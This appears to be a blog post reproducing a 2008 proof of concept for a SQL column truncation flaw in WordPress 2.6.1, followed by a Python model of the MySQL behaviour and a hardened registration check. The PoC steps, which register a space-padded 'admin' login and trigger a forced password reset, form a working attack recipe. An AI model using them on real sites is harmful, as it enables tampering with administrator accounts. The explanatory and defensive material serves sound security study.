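Date: 2021-05-23
WordPress users should take note; testing it against my own site had no effect, though, because I have had user registration disabled from the very beginning.
# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)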
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http:///wp-login.php?action=register
2. register as:
login: admin x
email: your email
^ admin[55 space chars]x
now, we have duplicated 'admin' account in database
3. go to url: server.com/wp-login.php?action=lostpassword
4. write your email into field and submit this form
5. check your email and go to reset confirmation link
6. admin's password changed, but new password will be sent to correct admin email ;/
# milw0rm.com
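The duplicate-account condition in the advisory comes from two legacy MySQL behaviours: over-long values are silently truncated in non-strict mode, and string comparison ignores trailing spaces. The following model is an added example, not part of the original advisory and not WordPress code; it assumes `user_login` is a VARCHAR(60) column, and all function names are hypothetical. It shows why a uniqueness check on the raw input passes, and how validating length and padding before the insert closes the gap.

```python
# Added illustration: a model of legacy MySQL string handling, not WordPress code.
COLUMN_WIDTH = 60  # assumption: wp_users.user_login is VARCHAR(60)

def mysql_store(value, strict=False):
    """Return what a VARCHAR(COLUMN_WIDTH) column ends up holding."""
    if len(value) > COLUMN_WIDTH:
        if strict:  # strict sql_mode: the INSERT fails instead
            raise ValueError("Data too long for column")
        return value[:COLUMN_WIDTH]  # non-strict: truncated with only a warning
    return value

def mysql_equal(a, b):
    """'=' under a PAD SPACE collation ignores trailing spaces (case folding omitted)."""
    return a.rstrip(" ") == b.rstrip(" ")

def matching_rows(table, login):
    """Rows that a WHERE user_login = login lookup would return."""
    return [row for row in table if mysql_equal(row, login)]

def naive_register(table, login):
    """Uniqueness check on the raw input, then insert: the pattern that fails."""
    if matching_rows(table, login):
        return False
    table.append(mysql_store(login))
    return True

def safe_register(table, login):
    """Reject over-length or space-padded logins before the database sees them."""
    if len(login) > COLUMN_WIDTH or login != login.strip():
        return False
    if matching_rows(table, login):
        return False
    table.append(mysql_store(login, strict=True))
    return True

if __name__ == "__main__":
    crafted = "admin" + " " * 55 + "x"  # constructed input, shape taken from the advisory
    users = ["admin"]
    print("naive accepted:", naive_register(users, crafted))
    print("rows matching 'admin':", len(matching_rows(users, "admin")))
    hardened = ["admin"]
    print("hardened accepted:", safe_register(hardened, crafted))
```

Running the database in strict SQL mode turns the silent truncation into a failed INSERT, which is the server-side counterpart of the length check in `safe_register`.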